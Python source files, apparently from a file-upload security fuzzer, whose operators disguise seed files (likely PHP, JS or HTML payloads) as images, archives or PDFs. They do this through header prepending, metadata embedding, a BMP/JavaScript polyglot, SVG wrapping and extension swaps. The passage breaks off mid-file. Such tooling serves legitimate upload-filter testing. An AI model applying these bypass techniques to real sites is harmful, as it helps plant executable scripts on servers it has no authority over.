/mutation_op/m01_pdf.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation1 : set 1024byte from resource file in front of seed"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M09','M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP','M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_ACE','M04_ARC','M04_ARJ','M04_BZ2','M04_DFXP','M04_EPUB','M04_GPX','M04_GZIP','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_WP','M04_WRI','M04_XHT','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M06','M07','M08','M09','M10']}#['M01_JPG', 'M01_PNG', 'M01_GIF', 'M01_ZIP', 'M01_TAR_GZ', 'M02_PNG', 'M02_JPG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M02_JSBMP', 'M02_JSGIF', 'M06', 'M07_OTHER', 'M08',  'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {"pdf":"resource/test.pdf"} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["php","html"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |     if resource_file == None:
14 |       resource_file = self.__resource__["pdf"]
15 | 
16 |     if output['filename'] != None and len(output['filename']) > 0:
17 |       filename = output['filename']
18 |     else:
19 |       filename = utils.extract_filename(seed_file)
20 |     output['filename'] = filename + '_M1PDF'
21 |     output['content'] = utils.extract_content(resource_file)[:1024] +">>"+ \
22 |               output['content']
23 |       #test
24 |       #f = open('file.bin', 'wb')
25 |       #f.write(output['content'])
26 |       #f.close()
27 | 


--------------------------------------------------------------------------------
/mutation_op/m01_png.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation1 : set 1024byte from png resource file in front of seed"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M09','M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP','M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_ACE','M04_ARC','M04_ARJ','M04_BZ2','M04_DFXP','M04_EPUB','M04_GPX','M04_GZIP','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_WP','M04_WRI','M04_XHT','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M06','M07','M08','M09','M10']}#['M01_JPG', 'M01_GIF', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_PNG', 'M02_JPG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M02_JSBMP', 'M02_JSGIF', 'M06', 'M07_OTHER', 'M08',  'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ =  {"png":"resource/test.png"} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["php","html"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |     if resource_file == None:
14 |       resource_file = self.__resource__["png"]
15 | 
16 |     if output['filename'] != None and len(output['filename']) > 0:
17 |       filename = output['filename']
18 |     else:
19 |       filename = utils.extract_filename(seed_file)
20 |     output['filename'] = filename + '_M1PNG'
21 |     output['content'] = utils.extract_content(resource_file)[:1024] + \
22 |               output['content']
23 |       #test
24 |       #f = open('file.bin', 'wb')
25 |       #f.write(output['content'])
26 |       #f.close()
27 | 


--------------------------------------------------------------------------------
/mutation_op/m01_tar_gz.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation1 : set 1024byte from resource file in front of seed"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M09','M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP','M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_ACE','M04_ARC','M04_ARJ','M04_BZ2','M04_DFXP','M04_EPUB','M04_GPX','M04_GZIP','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_WP','M04_WRI','M04_XHT','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M06','M07','M08','M09','M10']}#['M01_JPG', 'M01_PNG', 'M01_GIF', 'M01_ZIP', 'M01_PDF', 'M02_PNG', 'M02_JPG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M02_JSBMP', 'M02_JSGIF', 'M06', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {"targz":"resource/test.tar.gz"} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["php","html"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |     if resource_file == None:
14 |       resource_file = self.__resource__["targz"]
15 | 
16 |     if output['filename'] != None and len(output['filename']) > 0:
17 |       filename = output['filename']
18 |     else:
19 |       filename = utils.extract_filename(seed_file)
20 |     output['filename'] = filename + '_M1TARGZ'
21 |     output['content'] = utils.extract_content(resource_file)[:1024] + \
22 |             output['content']
23 | 
24 |       #test
25 |       #f = open('file.bin', 'wb')
26 |       #f.write(output['content'])
27 |       #f.close()
28 | 


--------------------------------------------------------------------------------
/mutation_op/m02_jpg.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import struct
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation2 : set seed in resource file as metadata"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M09','M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP','M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_ACE','M04_ARC','M04_ARJ','M04_BZ2','M04_DFXP','M04_EPUB','M04_GPX','M04_GZIP','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_WP','M04_WRI','M04_XHT','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M06','M07','M08','M09','M10']}#['M01_JPG', 'M01_PNG', 'M01_GIF', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_PNG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M02_JSBMP', 'M02_JSGIF', 'M06', 'M08', 'M10','M07_OTHER'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {"jpg":""} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["php","html"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |     commentBlock = [b'\xFF\xFE',struct.pack('>H',len(output['content'])+3),output['content'],b'\x00']
14 |     with open('./resource/test.jpg','rb') as fp:
15 |       data = fp.read()
16 |     injectpoint = struct.unpack('>H',data[4:6])[0]+4
17 | 
18 |     output['content'] = data[:injectpoint]+b''.join(commentBlock)+data[injectpoint:]
19 |     """
20 |     with open('new.jpg','wb') as fp:
21 |       fp.write(output['content'])
22 |     """
23 |     if output['filename'] != None and len(output['filename']) > 0:
24 |       filename = output['filename']
25 |     else:
26 |       filename = utils.extract_filename(seed_file)
27 |     output['filename'] = filename + '_M2JPG'
28 | 


--------------------------------------------------------------------------------
/mutation_op/m02_jsbmp.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import struct
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation2 : set seed in resource file as metadata"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'js':['M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_GIF','M04_JPG','M04_PNG']}#['M01_JPG', 'M01_PNG', 'M01_GIF', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_JPG', 'M02_PNG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M02_JSGIF', 'M06', 'M08','M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["js"] # seed file dependency for operation
11 | 
12 | 
13 |   def operation(self, output, seed_file, resource_file=None):
14 |     with open('./resource/test.bmp') as fp:
15 |       data = fp.read()
16 | 
17 |     data = data.replace(b'\x2A\x2F',b'\x00\x00')
18 | 
19 |     output['content'] = data[0:2]+b'\x2F\x2A'+data[4:]+b'\xFF\x2A\x2F\x3D\x31\x3B'+output['content']
20 | 
21 |     """
22 |     with open('new.bmp','wb') as fp:
23 |       fp.write(output['content'])
24 |     """
25 |     if output['filename'] != None and len(output['filename']) > 0:
26 |       filename = output['filename']
27 |     else:
28 |       filename = utils.extract_filename(seed_file)
29 |     output['filename'] = filename + '_M2JSBMP'
30 | 
31 | #============================================================================================================#
32 | #======= Script Referenced from : https://pastebin.com/04y7ee3u =============================================#
33 | #============================================================================================================#
34 | # Basic Principals : make header file size with \x2f\x2a\x00\x00 ( it is same with /* ) and append end of mutated bmp */=1;
35 | # In javascript, it same with BM/* blah blah */=1;, so it has not error in javascript syntax. Also, It has bmp structure.
36 | 


--------------------------------------------------------------------------------
/mutation_op/m04_zip.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M12_ZIP','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'js':['M12_ZIP','M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX']}#['M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["php","js"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |     if output['filename'] != None and len(output['filename']) > 0:
14 |       filename = output['filename']
15 |     else:
16 |       filename = utils.extract_filename(seed_file)
17 | 
18 |     output['filename'] = filename + '_M4ZIP'
19 |     if '.' not in output['fileext']:
20 |       output['fileext'] = 'zip'
21 |     else:
22 |       output['fileext'] = output['fileext'].rsplit('.',1)[0]+'.zip'
23 | 
24 | 


--------------------------------------------------------------------------------
/mutation_op/m04_tar_gz.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M12_TAR_GZ','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'js':['M12_TAR_GZ','M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX']}#['M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["php","js"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |     if output['filename'] != None and len(output['filename']) > 0:
14 |       filename = output['filename']
15 |     else:
16 |       filename = utils.extract_filename(seed_file)
17 | 
18 |     output['filename'] = filename + '_M4TARGZ'
19 |     if '.' not in output['fileext']:
20 |       output['fileext'] = 'tar.gz'
21 |     else:
22 |       output['fileext'] = output['fileext'].rsplit('.',1)[0]+'.tar.gz'
23 | 
24 | 


--------------------------------------------------------------------------------
/mutation_op/m04_txt.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'js':['M12_TXT','M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX']}#['M04_JPG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_PNG', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
 8 | 
 9 | #php':['M12_TXT','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],
10 |                         # operations in this list can be used to extra mutation.
11 |   __resource__ = {} # ({type:resource filename})
12 |   __seed_dependency__ = __exclusion_op__.keys()#["js","php"] # seed file dependency for operation
13 | 
14 |   def operation(self, output, seed_file, resource_file=None):
15 |       if output['filename'] != None and len(output['filename']) > 0:
16 |         filename = output['filename']
17 |       else:
18 |         filename = utils.extract_filename(seed_file)
19 | 
20 |       output['filename'] = filename + '_M4TXT'
21 |       if '.' not in output['fileext']:
22 |         output['fileext'] = 'txt'
23 |       else:
24 |         output['fileext'] = output['fileext'].rsplit('.',1)[0]+'.txt'
25 | 
26 | 


--------------------------------------------------------------------------------
/mutation_op/m04_pdf.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M12_HTML','M12_XHTML','M12_PDF','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'js':['M12_HTML','M12_XHTML','M12_PDF','M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX']}#['M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["php","js"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |     if output['filename'] != None and len(output['filename']) > 0:
14 |       filename = output['filename']
15 |     else:
16 |       filename = utils.extract_filename(seed_file)
17 | 
18 |     output['filename'] = filename + '_M4PDF'
19 |     if '.' not in output['fileext']:
20 |       output['fileext'] = 'pdf'
21 |     else:
22 |       output['fileext'] = output['fileext'].rsplit('.',1)[0]+'.pdf'
23 | 
24 | 


--------------------------------------------------------------------------------
/mutation_op/m02_png.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import struct
 3 | import zlib
 4 | 
 5 | class mOP(MutationOP):
 6 |   __comment__ = "Mutation2 : set seed in resource file as metadata"
 7 |   __mutate_type__ = "file"  # (file|request) ; type of target
 8 |   __exclusion_op__ = {'php':['M09','M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP','M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_ACE','M04_ARC','M04_ARJ','M04_BZ2','M04_DFXP','M04_EPUB','M04_GPX','M04_GZIP','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_WP','M04_WRI','M04_XHT','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M06','M07','M08','M09','M10']}#['M01_JPG', 'M01_PNG', 'M01_GIF', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_JPG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M02_JSBMP', 'M02_JSGIF', 'M06', 'M08', 'M10', 'M07_OTHER'] # ([classname])when this op used for mutation,
 9 |                         # operations in this list can be used to extra mutation.
10 |   __resource__ = {"jpg":""} # ({type:resource filename})
11 |   __seed_dependency__ = __exclusion_op__.keys()#["php","html"] # seed file dependency for operation
12 | 
13 |   def operation(self, output, seed_file, resource_file=None):
14 |     textChunk = [struct.pack('>I',8+len(output['content'])),b'tEXt',b'Comment\x00',output['content']]
15 |     textChunk.append(struct.pack('>I',zlib.crc32(b''.join(textChunk[1:]))&0xffffffff))
16 |     with open('./resource/test.png','rb') as fp:
17 |       data = fp.read()
18 |     injectpoint = data.index('IEND')-4
19 | 
20 |     output['content'] = data[:injectpoint]+b''.join(textChunk)+data[injectpoint:]
21 |     """
22 |     with open('new.png','wb') as fp:
23 |       print "test"
24 |       fp.write(output['content'])
25 |     """
26 |     if output['filename'] != None and len(output['filename']) > 0:
27 |       filename = output['filename']
28 |     else:
29 |       filename = utils.extract_filename(seed_file)
30 |     output['filename'] = filename + '_M2PNG'
31 | 


--------------------------------------------------------------------------------
/mutation_op/m08.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation 8: Insert scripts in SVG file"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 | 
 8 |   # XXX: Fill the exclusion operator and seed dependency
 9 |   __exclusion_op__ = {'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP', 'M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M07', 'M08', 'M10']}
10 |                         # operations in this list can be used to extra mutation.
11 |   __resource__ = {""} # ({type:resource filename})
12 |   __seed_dependency__ = __exclusion_op__.keys()#['html'] # seed file dependency for operation
13 | 
14 |   def operation(self, output, seed_file, resource_file=None):
15 |     base_headdata = """<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 96 105">\n"""
16 |     base_taildata = """\n  <g fill="#97C024" stroke="#97C024" stroke-linejoin="round" stroke-linecap="round">
17 |     <path d="M14,40v24M81,40v24M38,68v24M57,68v24M28,42v31h39v-31z" stroke-width="12"/>
18 |     <path d="M32,5l5,10M64,5l-6,10 " stroke-width="2"/>
19 |   </g>
20 |   <path d="M22,35h51v10h-51zM22,33c0-31,51-31,51,0" fill="#97C024"/>
21 |   <g fill="#FFF">
22 |     <circle cx="36" cy="22" r="2"/>
23 |     <circle cx="59" cy="22" r="2"/>
24 |   </g>
25 | </svg>
26 | """
27 |     output['content'] = base_headdata+output['content']+base_taildata
28 |     #print output['content']
29 |     if output['filename'] != None and len(output['filename']) > 0:
30 |       filename = output['filename']
31 |     else:
32 |       filename = utils.extract_filename(seed_file)
33 |     output['filename'] = filename + '_M8'
34 |     output['fileext'] = 'svg'
35 | 


--------------------------------------------------------------------------------
/mutation_op/m02_zip.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import struct
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation2 : set seed in resource file as metadata"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M09','M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP','M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_ACE','M04_ARC','M04_ARJ','M04_BZ2','M04_DFXP','M04_EPUB','M04_GPX','M04_GZIP','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_WP','M04_WRI','M04_XHT','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M06','M07','M08','M09','M10']}#['M01_JPG', 'M01_PNG', 'M01_GIF', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_PNG', 'M02_JPG', 'M02_GIF', 'M02_PDF', 'M02_JSBMP', 'M02_JSGIF', 'M06', 'M08', 'M07_OTHER', 'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {"jpg":""} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["php","html"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |     DIRENTRY_SIGN = b'\x50\x4b\x01\x02'
14 |     with open('./resource/test.zip','rb') as fp:
15 |       data = fp.read()
16 | 
17 |     direntry_root = data.index(DIRENTRY_SIGN)
18 |     COMMENT_LEN = struct.pack('<H',len(output['content']))
19 |     injectpoint = direntry_root+46+struct.unpack('<H',data[direntry_root+28:direntry_root+30])[0]+struct.unpack('<H',data[direntry_root+30:direntry_root+32])[0]
20 | 
21 |     output['content'] = data[:direntry_root+32]+COMMENT_LEN+data[direntry_root+34:injectpoint]+output['content']+data[injectpoint:]
22 |     """
23 |     with open('new.zip','wb') as fp:
